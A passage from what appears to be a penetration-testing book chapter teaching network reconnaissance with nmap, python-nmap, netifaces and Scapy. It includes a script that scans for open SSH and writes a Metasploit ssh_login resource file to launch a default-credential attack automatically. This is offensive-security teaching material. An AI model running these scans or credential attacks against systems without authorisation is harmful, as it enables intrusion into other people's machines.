Now that you have understood the purpose and benefits of the nmap grepable output, let's look at the benefits of the XML output. One item should be noted before moving on, which will help you understand what the XML benefits are. Look at a line from the nmap grepable output. You can see that there are very few special characters for differentiating the fields of data; this means that you can extract only small components of information with ease. To get larger quantities, you have to insert delimiters using sed and awk. This is a painful process, but thankfully, you have the solution at hand: the XML output.
Understanding the Nmap XML output
XML builds trees of data that use child and parent components to label datasets. This allows easy and direct parsing of data using specific label grabs after walking the tree that lists the parent and child relationships. Most importantly, because of this, XML outputs can be imported by other tools, such as Metasploit. You can easily output to only XML using the -oX
option. More details of these benefits will be covered in later chapters, specifically when parsing XML using Python in Chapter 9, Automating Reports and Tasks with Python, to help automatically generate report data.
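To make the parent and child idea concrete, here is a minimal Python 3 sketch that walks a small XML tree with the standard library. The SAMPLE_XML string is hand-written to mimic the general shape of -oX output (host, address, ports, port, state, and service elements); it is not real scan data, and the open_ports function is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

# Hand-written sample that mimics the shape of `nmap -oX` output; not real scan data.
SAMPLE_XML = """<nmaprun>
  <host>
    <status state="up"/>
    <address addr="192.168.195.112" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="closed"/>
        <service name="http"/>
      </port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text):
    """Return (address, port, service) tuples for every open port in the XML."""
    results = []
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        address = host.find("address").get("addr")
        for port in host.findall("ports/port"):
            if port.find("state").get("state") == "open":
                service = port.find("service")
                name = service.get("name") if service is not None else "unknown"
                results.append((address, int(port.get("portid")), name))
    return results


print(open_ports(SAMPLE_XML))
```

Each lookup names the element it wants instead of counting fields on a line, which is the practical advantage over the grepable format.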
The Nmap scripting engine
Nmap has a number of scripts that provide unique capabilities for assessors. They can help identify vulnerable services and exploit systems or interact with complex system components. These scripts are coded in a language called Lua, which will not be covered here. These scripts can be found at /usr/share/nmap/scripts within Kali. Scripts are called using the --script option, which accepts a comma-delimited list of script names. Make sure you know what each script does before executing it against a target, because there may be unintended consequences on target systems.
Note
More details about nmap
scripts can be found at http://nmap.org/book/man-nse.html. Specific details about nmap
scripts can be found at http://nmap.org/nsedoc/, along with their purposes and category associations.
Scripts can be selected by the category they belong to, and scripts or categories you do not want can be excluded. As an example, the following command runs the nmap tool with all default or safe scripts except those whose names start with http-:
nmap --script "(default or safe) and not http-*" <target IP>
By now, you should have a pretty good understanding of how to use nmap and the capabilities within it. Let's look at being efficient with nmap. This is because the biggest limiting component of a penetration test is time, and during that time period, we need to succinctly identify vulnerable targets.
Being efficient with Nmap scans
Nmap is a great tool, but you can be limited by poor network design, large target sets, and unrestricted port ranges. So, the trick to being efficient is to limit the number of ports you scan until you know which targets are live. This can be done by targeting subnets that have live devices and only scanning those ranges. The easiest way to do this is to look for default gateways that are active in a network. So, if you see that your default gateway is 192.168.1.1, it is likely that other default gateways are active at similar addresses in neighboring /24 networks, such as 192.168.2.1. Pinging the default gateway is a little noisy, but it is typically consistent with most of the nominal network traffic.
Nmap has a built-in capability that lets you target the statistically more common ports using the --top-ports option followed by a number. As an example, you could look for the top 10 ports using the --top-ports 10 option. These statistics were gathered through long-term scanning of Internet-facing hosts, which means that they are based on what would be exposed to the Internet. So, remember that if you are doing an internal network assessment, this option may not provide the expected results.
As an assessor, you are often provided a range of targets to assess. Sometimes, this range is extremely large. This means that you need to try and identify live segments by seeing which locations' default gateways are active. Each active default gateway and the relevant subnet will tell you where you should scan. So, if you have a default gateway of 192.168.1.1 and your subnet mask is 255.255.255.0, or /24, you should check for other default gateways from 192.168.2.1 to 192.168.255.1. As you ping each default gateway, if it responds, you know that there are likely live hosts in that subnet. This can be done easily with a well-known bash for loop:
for i in `seq 1 255`; do ping -c 1 192.168.$i.1 | tr \\n ' ' | awk '/1 received/ {print $2}'; done
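The same list of candidate gateways can be produced in Python before any packets are sent. The following is a minimal Python 3 sketch using the standard ipaddress module. It assumes, as the loop above does, that each gateway sits at the first address of its /24 and that all sibling subnets live inside the same /16; that is a convention, not a guarantee. The candidate_gateways name and its parameters are hypothetical.

```python
import ipaddress


def candidate_gateways(gateway, prefix=24, supernet_prefix=16):
    """List the first host address of every sibling subnet inside the parent block."""
    own = ipaddress.ip_network("%s/%d" % (gateway, prefix), strict=False)
    parent = own.supernet(new_prefix=supernet_prefix)
    candidates = []
    for subnet in parent.subnets(new_prefix=prefix):
        # Skip the subnet we already sit in; its gateway is known
        if subnet != own:
            candidates.append(str(subnet.network_address + 1))
    return candidates


gateways = candidate_gateways("192.168.1.1")
print(len(gateways), gateways[0], gateways[1], gateways[-1])
```

Unlike the bash loop, this sketch also includes 192.168.0.1, because the 192.168.0.0/24 subnet is a valid sibling of 192.168.1.0/24.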
This means that you have to look for your default gateway address and subnet to verify the details for each interface you are using. What if you could automate the process of finding these system details with a Python script? To begin this journey, start by extracting the details of the interfaces with the netifaces
library.
Determining your interface details with the netifaces library
We demonstrated how to find interface details using a Python script in Chapter 2, The Basics of Python Scripting. It was designed to find details on any system regardless of libraries, but it only found addresses based on a list of interface names provided. Also, it was a script that would not be considered very tight. Instead, we can use the netifaces
library for Python to iterate through the addresses and discover the details.
This script uses a number of functions to accomplish specific tasks. The functions included are get_networks
, get_addresses
, get_gateways
, and get_interfaces
. These functions do exactly what you expect them to. The first function, get_interfaces
, finds all the relevant interfaces for that system:
def get_interfaces():
    interfaces = netifaces.interfaces()
    return interfaces
The second function identifies the gateways and returns them as a dictionary:
def get_gateways():
    gateway_dict = {}
    gws = netifaces.gateways()
    for gw in gws:
        try:
            gateway_iface = gws[gw][netifaces.AF_INET]
            gateway_ip, iface = gateway_iface[0], gateway_iface[1]
            gw_list = [gateway_ip, iface]
            gateway_dict[gw] = gw_list
        except:
            pass
    return gateway_dict
The third function identifies the addresses for each interface, which includes the MAC address, interface address (typically IPv4), broadcast address, and network mask. All of these details are sourced by passing the interface name to the function:
def get_addresses(interface):
    addrs = netifaces.ifaddresses(interface)
    link_addr = addrs[netifaces.AF_LINK]
    iface_addrs = addrs[netifaces.AF_INET]
    iface_dict = iface_addrs[0]
    link_dict = link_addr[0]
    hwaddr = link_dict.get('addr')
    iface_addr = iface_dict.get('addr')
    iface_broadcast = iface_dict.get('broadcast')
    iface_netmask = iface_dict.get('netmask')
    return hwaddr, iface_addr, iface_broadcast, iface_netmask
The fourth, and last, function takes the dictionary provided by the get_gateways function and maps each gateway IP to its interface. It then calls the get_addresses function to identify the rest of the details about the interface. All of this is then loaded into a dictionary that is keyed by the interface name:
def get_networks(gateways_dict):
    networks_dict = {}
    # Iterate over the dictionary that was passed in, not a global
    for key, value in gateways_dict.items():
        gateway_ip, iface = value[0], value[1]
        hwaddress, addr, broadcast, netmask = get_addresses(iface)
        network = {'gateway': gateway_ip, 'hwaddr': hwaddress, 'addr': addr, 'broadcast': broadcast, 'netmask': netmask}
        networks_dict[iface] = network
    return networks_dict
Note
The full script code can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/ifacesdetails.py.
The following screenshot highlights the execution of this script:

Now, we know that this is not directly related to scanning and identifying targets, but it is useful for eliminating targets, namely your own system. Once you start assessing systems automatically, you will not want your own system to be in the list. We are going to highlight how to scan systems with the nmap libraries, identify the targetable services, and then eliminate any IP address that may be our system.
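The elimination step itself needs nothing more than the 'addr' values from the dictionary built by get_networks. Here is a minimal Python 3 sketch of that idea. The remove_own_addresses name is hypothetical, and the sample dictionary uses made-up addresses shaped like the output described above.

```python
def remove_own_addresses(targets, networks):
    """Drop any target whose IP matches the 'addr' of a local interface."""
    own = {details["addr"] for details in networks.values()}
    return [ip for ip in targets if ip not in own]


# Illustrative values shaped like the dictionary returned by get_networks()
networks = {
    "eth0": {
        "gateway": "192.168.195.2",
        "hwaddr": "00:0c:29:aa:bb:cc",
        "addr": "192.168.195.159",
        "broadcast": "192.168.195.255",
        "netmask": "255.255.255.0",
    }
}
targets = ["192.168.195.112", "192.168.195.159", "192.168.195.2"]
print(remove_own_addresses(targets, networks))
```

Building a set of local addresses first keeps the comparison to a single pass over the target list, however many interfaces the attack box has.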
Nmap libraries for Python
Python has libraries that allow you to execute nmap
scans directly, either through the interactive interpreter or by building multifaceted attack tools. For this example, let's use the nmap
library to scan our local Kali instance for a Secure Shell (SSH) service port. Make sure that the service has started by executing the /etc/init.d/ssh start
command. Then install the Python nmap
libraries with pip install python-nmap
.
You can now execute a scan by directly using the libraries, importing them, and assigning nmap.PortScanner()
to a variable. That instantiated variable can then be used to execute scans. Let's perform an example scan within the interactive interpreter. The following is an example of a scan for port 22
, done using the interactive Python interpreter against the local Kali instance:

As you can see, it's a dictionary of dictionaries that can each be called as necessary. It takes a little more effort to execute a scan through the interactive interpreter, but it is very useful in environments where you have gained a foothold, Python is present, and you are able to install libraries during the course of your engagement. The bigger reason for doing this is scripting of methods that will make targeted exploitation easier.
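Walking a dictionary of dictionaries is easier to see with a small stand-in. The following Python 3 sketch uses a hand-written dictionary, not real scanner output; its keys mirror the lookups used by the scripts in this chapter (host, then 'tcp', then the port number, then 'state' and 'name'), and the describe_ports function is a hypothetical helper.

```python
# Hand-written stand-in for the nested scan result; the values are illustrative.
scan_result = {
    "127.0.0.1": {
        "tcp": {
            22: {"state": "open", "name": "ssh"},
        },
    },
}


def describe_ports(result):
    """Flatten the nested dictionaries into one readable line per port."""
    lines = []
    for host, protocols in result.items():
        for port, details in sorted(protocols.get("tcp", {}).items()):
            lines.append("%s tcp/%d %s (%s)" % (host, port, details["state"], details["name"]))
    return lines


for line in describe_ports(scan_result):
    print(line)
```

The .get("tcp", {}) call is a defensive choice for hosts that returned no TCP results, so that the loop skips them instead of raising a KeyError.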
To highlight this, we can create a script that accepts CLI arguments to scan for specific hosts and ports. Since we are accepting arguments from the CLI, we need to import the sys library, and because we are scanning with the nmap library, we need to import nmap. Remember to use conditional handlers when importing libraries that are not native to Python; it keeps tools easy to maintain and it is far more professional:
import sys
try:
    import nmap
except ImportError:
    sys.exit("[!] Install the nmap library: pip install python-nmap")
Once the libraries have been imported, the script can have the argument requirements designed. We need exactly two arguments. This means that if there are fewer than two arguments or more than two, the script should fail with a help message. Remember that the script name counts as the first entry in sys.argv, so the length we check for is 3. The results of the required arguments produce the following code:
# Argument Validator
if len(sys.argv) != 3:
    sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
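As an alternative to counting entries in sys.argv by hand, the standard argparse module can enforce the same two positional arguments and generate the help message for you. This is a minimal Python 3 sketch of that approach, not the method used by the chapter's script. The build_parser name and the help strings are assumptions.

```python
import argparse


def build_parser():
    """Describe the two positional arguments the scanner expects."""
    parser = argparse.ArgumentParser(description="Scan targets for the given ports")
    parser.add_argument("targets", help="hosts or ranges to scan, for example 192.168.195.0/24")
    parser.add_argument("ports", help="port or port range, for example 22 or 1-1024")
    return parser


# An explicit list keeps the example repeatable; a real script would call
# parse_args() with no arguments so that it reads from the command line.
args = build_parser().parse_args(["127.0.0.1", "22"])
print(args.targets, args.ports)
```

With this in place, running the script with too few or too many arguments makes argparse print a usage message and exit on its own.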
Now, if we run the nmap_scanner.py
script without any arguments, we should get an error message, as shown in the following screenshot:

This is the basic shell of the script into which you can then build the actual scanner. It is a very small component that amounts to instantiating the class and then passing to it the address and ports, which are then printed:
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
    if not scanner[host].hostname():
        print("The host's IP address is %s and its hostname was not found" % (host))
    else:
        print("The host's IP address is %s and its hostname is %s" % (host, scanner[host].hostname()))
This fantastically small script provides you with the means to quickly execute the necessary scan. This test shows the system's virtual interface, which I have tested with both the localhost identifier and the interface IP address. There are two things to note: when you scan with the localhost identifier, you will receive a hostname; when you scan the IP address of the system without querying a name service, you will not be able to identify the hostname. The following screenshot shows the output of this script:

Note
This script can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/nmap_scannner.py.
So, the big benefit here is that now you can start automating exploitation of systems—to a point. These types of automation should be relatively benign so that if something fails, it causes no damage or impact to the environment's confidentiality, integrity, or availability. You can do this through the Metasploit Framework's Remote Procedure Call (MSFRPC), or by automatically building resource files that you can execute. For this example, let's simply build a resource file that can execute a credential attack to check for default Kali credentials; you did change them, right?
We need to generate a file by writing lines to it similar to the commands we would execute in the Metasploit Console. So look at the ssh_login
module for Metasploit by performing search ssh_login
, and then show the options after loading the console with msfconsole
. Identify the required options. The following screenshot shows an example of items that can, and must, be set:

Some of these items are already set, but the components that are missing are the remote host's IP address and the credentials we are going to test. The default port is set, but if your script is designed to test for different ports, then this must be set as well. You will notice that the credentials are not required fields, but to execute a credential attack, you do need them. To create this file, we are going to open it for writing with Python's open function and then write each line to it. We are also going to set the buffer size to zero so that data is written to the file immediately, rather than relying on the operating system defaults to flush the data to the file.
The script is also going to create a separate resource file that contains the IP address for each host that it identifies. The additional benefit that comes from running this script is that it creates a list of targets that have SSH enabled. In future, you should try to build scripts that are not designed for testing a single service, but this is a good example to get you started. We are going to build on the previous script concepts, but again we are going to build functions to modularize it. This will allow you to convert it into a class more easily in future. First, we add all the functions of the ifacedetails.py
script and the libraries imported. We are then going to modify the argument code of the script so that it accepts more arguments:
# Argument Validator
if len(sys.argv) != 5:
    sys.exit("[!] Please provide four arguments the first being the targets the second the ports, the third the username, and the fourth the password")
password = str(sys.argv[4])
username = str(sys.argv[3])
ports = str(sys.argv[2])
hosts = str(sys.argv[1])
Now build a function that accepts the details passed to it and creates a resource file. You will create string variables that contain the necessary values that will be written to the ssh_login.rc file. The details are then written to the file using the simple open command with the relevant bufsize of 0, as mentioned earlier. Once the strings have been written, the file is closed. Look closely at the set_rhosts value: it points to a file that contains one IP address per line. So, we need to generate this file and then pass it to this function:
def resource_file_builder(dir, user, passwd, ips, port_num, hosts_file):
    ssh_login_rc = "%s/ssh_login.rc" % (dir)
    bufsize = 0  # unbuffered writes, as supported by Python 2
    set_module = "use auxiliary/scanner/ssh/ssh_login\n"
    # Use the values passed to the function rather than the globals
    set_user = "set username " + user + "\n"
    set_pass = "set password " + passwd + "\n"
    set_rhosts = "set rhosts file:" + hosts_file + "\n"
    set_rport = "set rport " + port_num + "\n"
    execute = "run\n"
    f = open(ssh_login_rc, 'w', bufsize)
    f.write(set_module)
    f.write(set_user)
    f.write(set_pass)
    f.write(set_rhosts)
    f.write(set_rport)
    f.write(execute)
    f.close()
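If you are working in Python 3, unbuffered text files are not available, so a with block is the usual way to make sure the data reaches the disk. The following is a minimal Python 3 sketch of the same idea, split into a function that builds the text and one that writes it. The function names, the placeholder credentials, and the temporary directory are assumptions made for illustration; the option names are the ones used in the function above.

```python
import os
import tempfile


def build_resource_text(user, passwd, port_num, hosts_file):
    """Return the msfconsole commands for the ssh_login module as one string."""
    lines = [
        "use auxiliary/scanner/ssh/ssh_login",
        "set username %s" % user,
        "set password %s" % passwd,
        "set rhosts file:%s" % hosts_file,
        "set rport %s" % port_num,
        "run",
    ]
    return "\n".join(lines) + "\n"


def write_resource_file(directory, text):
    """Write the resource text to ssh_login.rc inside directory and return its path."""
    path = os.path.join(directory, "ssh_login.rc")
    # Leaving the with block closes the file, which also flushes it to disk
    with open(path, "w") as handle:
        handle.write(text)
    return path


# A temporary directory and placeholder credentials keep the example harmless
with tempfile.TemporaryDirectory() as tmp:
    text = build_resource_text("example_user", "example_pass", "22", "/root/ssh_hosts")
    rc_path = write_resource_file(tmp, text)
    with open(rc_path) as handle:
        print(handle.read())
```

Separating the text from the file handling also makes the generated commands easy to inspect or test before anything is written.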
Next, let's build the actual target_identifier function, which will scan for targets with the nmap library using the port and IPs supplied. First, it clears the contents of the ssh_hosts file. Then it checks whether the scan was successful or not. If the scan was successful, the script initiates a for loop over each host identified through the scan. For each of those hosts, it loads the interface dictionary and iterates through the key-and-value pairs.
The key holds the interface name, and the value is an embedded dictionary that holds the details of that interface mapped to named keys, as shown in the previous ifacedetails.py script. The value of the 'addr' key is compared with the host from the scan. If the two match, then the host belongs to the assessor's box and not the organization being assessed. When this happens, the host value is set to None and the target is not added to the ssh_hosts file. There is a final check to verify that the port is actually an SSH port and that it is open. Then the value is written to the ssh_hosts file, and the file path is returned to the main function. The script does not block out the localhost IP address; we left it in both for testing and as a point of comparison. If you want to include this capability, modify this function:
def target_identifier(dir, user, passwd, ips, port_num, ifaces):
    bufsize = 0
    ssh_hosts = "%s/ssh_hosts" % (dir)
    scanner = nmap.PortScanner()
    scanner.scan(ips, port_num)
    # Truncate any ssh_hosts file left over from a previous run
    open(ssh_hosts, 'w').close()
    if not scanner.all_hosts():
        sys.exit("[!] No viable targets were found!")
    e = open(ssh_hosts, 'a', bufsize)
    for host in scanner.all_hosts():
        # Drop the host if it matches one of our own interface addresses
        for k, v in ifaces.items():
            if v['addr'] == host:
                print("[-] Removing %s from target list since it belongs to your interface!" % (host))
                host = None
        if host is not None:
            port_data = scanner[host]['tcp'][int(port_num)]
            if 'ssh' in port_data['name'] and 'open' in port_data['state']:
                print("[+] Adding host %s to %s since the service is active on %s" % (host, ssh_hosts, port_num))
                e.write(host + "\n")
    e.close()
    return ssh_hosts
Now the script needs some default values set prior to execution. The easiest way to do this is to set them after the argument validator. Take a look at your script, eliminate the duplicates outside of functions (if there are any), and place the following code after the argument validator:
home_dir = "/root"
gateways = {}
network_ifaces = {}
One final change to the script is the inclusion of a test to see whether it was executed as a standalone script or imported as a module. We have been executing these scripts natively without this, but it is best practice to include a simple check so that the script can be converted into a class. When Python runs a file directly as a standalone script, it sets __name__ to '__main__'; when the file is imported, __name__ holds the name of the module instead. The only thing this check does is test for the first case.
Look at the following code, which executes the relevant functions in order of necessity. This is done to identify the viable hosts to exploit and then pass the details to the resource file generator:
if __name__ == '__main__':
    gateways = get_gateways()
    network_ifaces = get_networks(gateways)
    hosts_file = target_identifier(home_dir, username, password, hosts, ports, network_ifaces)
    resource_file_builder(home_dir, username, password, hosts, ports, hosts_file)
You will often see scripts on the Internet that call a main() function instead of a series of functions. This is functionally equivalent to what we are doing here: you can create a main() function above the if __name__ == '__main__': check that contains the preceding details, and then execute it as highlighted here:
if __name__ == '__main__':
    main()
With these minor changes, you can automatically generate resource files based on the results of a scan. Finally, change the script name to ssh_login.py
and then save and run it. When the script is run, it generates the code necessary for configuring and executing the exploit. Then you can run the resource file with the -r
option, as shown in the following screenshot. As you may have noticed, I did a test run that included my interface IP address to highlight the built-in error checking, and then executed the test against localhost. I verified that the resource file was created correctly and then ran it.

Once in the console, you can see that the resource file executed the attack on its own with the following results. The green +
sign means that a shell was opened on the Kali box.

Resource files can also be called from within Metasploit using the resource command followed by the filename. For this attack, the command would be resource ssh_login.rc, which would have produced the same results. You can then interact with the newly opened session using the sessions -i <session number> command.
The following screenshot shows the validation of the username and hostname in the Kali instance:

Of course, you would not want to do this to your normal attack box, but it provides three key items, and they need to be foot stomped. Always change your default password; otherwise, you may be a victim, even during an engagement. Also change your Kali instance hostname to something defensive network tools will not pick up, and always test your exploits prior to usage.
Note
More details about the Python nmap library can be found at http://xael.org/norman/python/python-nmap/.
Now, with an understanding of nmap, nmap libraries, and the automated generation of Metasploit resource files, you are ready to start learning about scapy.
Note
This script can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/ssh_login.py.
The Scapy library for Python
Welcome to Scapy, the Python library that is designed to manipulate, send, and read packets. Scapy is one of those tools that have a large amount of applicability, but it can seem complex to use. Before we set off, there are some basic rules to understand about Scapy that will make creating scripts much easier.
Firstly, refer to the previous sections to understand the TCP flags and how they are represented in Scapy. You will need to look at the flags mentioned earlier and their relevant positions to use them. Secondly, when Scapy receives responses for a packet sent, the flags are represented as individual bits within the 13th octet of the TCP header, which you read as a single number. So, you have to read the response based on this information.
Look at the following table, which represents the binary positional values of each flag as it is set:

So when you are reading the responses from the TCP packets and looking for a specific type of flag, you have to do the math. The preceding table will help simplify this for you, and if you have ever worked with tcpdump, keep in mind that the values are identical. As an example, if you were looking for a SYN packet, you would see the value of the 13th octet as 2. If it was SYN + ACK, it would be a value of 18. Simply add the flag values together and you will have what you are looking for.
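The arithmetic can be captured in a few lines of Python 3. This sketch lists the bit value of each TCP flag and converts between a number and the flag names it represents. The TCP_FLAGS list and the decode_flags and encode_flags helpers are names chosen for this example and are not part of Scapy.

```python
# Bit value of each flag carried in the flags octet of the TCP header
TCP_FLAGS = [
    ("FIN", 1),
    ("SYN", 2),
    ("RST", 4),
    ("PSH", 8),
    ("ACK", 16),
    ("URG", 32),
    ("ECE", 64),
    ("CWR", 128),
]


def decode_flags(value):
    """Return the names of every flag whose bit is set in value."""
    return [name for name, bit in TCP_FLAGS if value & bit]


def encode_flags(*names):
    """Add together the bit values of the named flags."""
    lookup = dict(TCP_FLAGS)
    return sum(lookup[name] for name in names)


print(decode_flags(2))
print(decode_flags(18))
print(encode_flags("SYN", "ACK"))
```

Testing each bit with the & operator is what lets a value such as 18 be split back into SYN and ACK without a lookup table of every combination.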
The next thing to keep in mind is that if you try to ping the loopback interface or localhost, the packet will not be assembled. This is because the kernel intercepts the request and processes it internally through the TCP/IP stack of the system. This is one of the errors that people get stuck on with Scapy, and they often quit. So, instead of digging into fixing your packets so that they can hit your own Kali instance, spin up your Metasploitable instance or try and test your default gateway.
Tip
If you want to understand more about testing loopback interfaces or the localhost value, you can find the solution at http://www.secdev.org/projects/scapy/doc/troubleshooting.html.
Therefore, we are going to highlight testing a connection and then scanning a web port with Scapy. You have to understand that Scapy has multiple ways of sending and receiving packets, and depending on the data you want to extract, complex methods may not be necessary. First, look at what you are trying to accomplish. If you want to remain independent of the operating system, the two methods you should use are sr() for layer 3 and srp() for layer 2. Next, if the method has 1 after the function name but before the parentheses, such as sr1(), it means that it returns only the first answer. This can be plenty to achieve most results, but if there are multiple packets in a stream that need to be evaluated, you will want to forgo these types of methods.
Next is the send()
method, which uses the operating system defaults for layer 2 and some operating system capabilities for layer 3 and above. Finally, there is sendp()
, which uses a custom layer 2 header. This can be created using the Ether()
method to represent the Ethernet frame header. This is extremely useful for wireless networks or locations where Virtual Local Area Networks (VLANs) are used to segment networks based on theoretical security. This is because wireless communication operates at layer 2, and VLANs are identified in this layer as well.
Note
Access Control Lists (ACL) based on VLANs are considered a cause of annoyance by most assessors, not security. This is because in most networks, you can easily hop network segments by manipulating the header of layer 2 frames. As you gain more experience, you will regularly see examples of this on live networks.
So, import the Scapy library and then set a variable with the destination IP address you want to ping. Create a packet that will contain the communication details and flags that you want sent to the target host. Then set a response variable to catch the results of the sr1()
function:
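#!/usr/bin/env python
import sys
try:
    from scapy.all import *
except ImportError:
    sys.exit("[!] Install the scapy libraries with: pip install scapy")
ip = "192.168.195.2"
icmp = IP(dst=ip)/ICMP()
# sr1() returns the first answer, or None if nothing arrives before the timeout
resp = sr1(icmp, timeout=10)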

Now that you see that you got one answer, it means that the host is most likely up. You can validate it with the following test:
if resp is None:
    print("The host is down")
else:
    print("The host is up")
When you test this, you can see that the results of the ping scan were successful, as follows:

We successfully pinged the host and validated the response variable by proving that it was not empty. From this, we can now check whether it has a web port open. To accomplish this, we will execute a SYN scan. Before doing this, however, understand that the sr() function, unlike sr1(), returns both the answered and the unanswered packets. So, the best thing to do is separate the two of them, and thanks to Scapy and Python syntax, this is extremely easy. You simply assign the result to two different variables, the first being the answers and the second being the unanswered, as shown here:
answers,unanswers = sr(icmp, timeout=10)
With this simple change, you now have the data returns cleaned up for easier manipulation. Furthermore, you can get summaries from these details by simply appending .summary() to answers or unanswers. If you are iterating through a list of ports from 0 to 1024, you can look at the results for a specific port by indexing the answers variable by position in the list. So, if you want to see the results from a scan at port 80, you can index the list like this: answers[80]. Keep in mind that answers holds only the probes that received a reply, so the position matches the port number only when every earlier probe was answered. Each entry holds both the sent and received packets, and these can be split further just like the previous example, as shown in this code:
sent, received = answers[80]
Keep in mind that this example only works for port 80, as you designated the location you wanted to pull the data from. To separate the sent and received packets for every answer instead, iterate over the answers variable and unpack each entry into the sent and received variables in turn.
Now that you have the basics listed, you can develop a packet, send it to a target, and receive the results. One thing to cover before moving forward is how easy it is to build a packet from the ground up, which involves building the IP header first and then the TCP header. Next, you pass the data to the scanner, which identifies the target as either alive or not. You can configure it so that there is no timeout value, but I highly discourage this as you may have to wait forever with no return. The following script was run to identify the 192.168.195.1
host and determine whether a web port was open:
#!/usr/bin/env python
from scapy.all import *
ip = "192.168.195.1"
dst_port = 80
headers = IP(dst=ip)/TCP(dport=dst_port, flags="S")
answers, unanswers = sr(headers, timeout=10)
As you can see in the following screenshot, the system responded with an answer. The preceding script can run standalone, or you can use the interactive interpreter to execute each line, as shown here:

Now the details can be extracted from the answers variable. Remember that this is a list, so you step through its entries one at a time. The entry at position 0 holds the first packet sent together with its reply, and each location after that holds the next answered packet and its reply:
for a in answers:
    print(a[1][1].flags)
Here is the catch, though: each value in the list is actually another list with more data in it. This kind of nested structure is often described as a matrix, but do not fret! It is pretty easy to navigate. First, remember that we used the sr() function, so this means that the results will be from layer 3 and above. Within each received packet, each embedded layer is the protocol above the previous one; in this case, it will be TCP. We performed a SYN scan, so we are looking for a SYN + ACK response. As you can see by referencing the preceding section related to TCP flags, the value you are looking for in the header is 18, which can be calculated by adding the positional value of ACK = 16 and the positional value of SYN = 2. The following screenshot shows the actual result, which shows that the port is open. Understanding these concepts will allow you to use Scapy in future scripts.
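Once you have the flags value from a reply, turning it into a port state is a small decision. The following Python 3 sketch shows one way to do that with plain integers, so it runs without Scapy installed. It assumes the usual SYN scan interpretation: SYN + ACK means open, a reset means closed, and no reply means the probe was dropped or the host is down. The classify_syn_response name is hypothetical.

```python
SYN, RST, ACK = 2, 4, 16


def classify_syn_response(flags):
    """Map the flags value of a reply to a SYN probe onto a port state."""
    if flags is None:
        # No reply arrived before the timeout
        return "filtered or host down"
    if flags & (SYN | ACK) == (SYN | ACK):
        return "open"
    if flags & RST:
        return "closed"
    return "unexpected"


print(classify_syn_response(18))
print(classify_syn_response(20))
print(classify_syn_response(None))
```

Comparing individual bits rather than testing for exactly 18 means a reply that carries an extra flag alongside SYN and ACK is still treated as open.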

You now have a basic understanding of Scapy, but don't worry! You are not done with it yet. Scapy has a significant amount of capability, which we have only touched on, and it provides you with the means to not only execute simple scans, but also manipulate network traffic. Many embedded devices and Industrial Control Systems (ICS) use unique communication forms to provide command and control for other units. At other times, you will realize that you need to identify live devices when nmap is being blocked. Scapy can help you fulfill all of these tasks.
Summary
In this chapter, a lot of details about identifying live hosts on the network, viable targets, and the different communication models were covered. To facilitate your understanding of the protocols and how they communicate, we discussed their different forms at the packet and frame levels. This chapter culminated with the automated exploitation of hosts using the Python nmap
and Scapy
libraries supporting the target identification. In the next chapter, we will build on these concepts to see how to exploit services with dictionary, brute-force, and password spray attacks.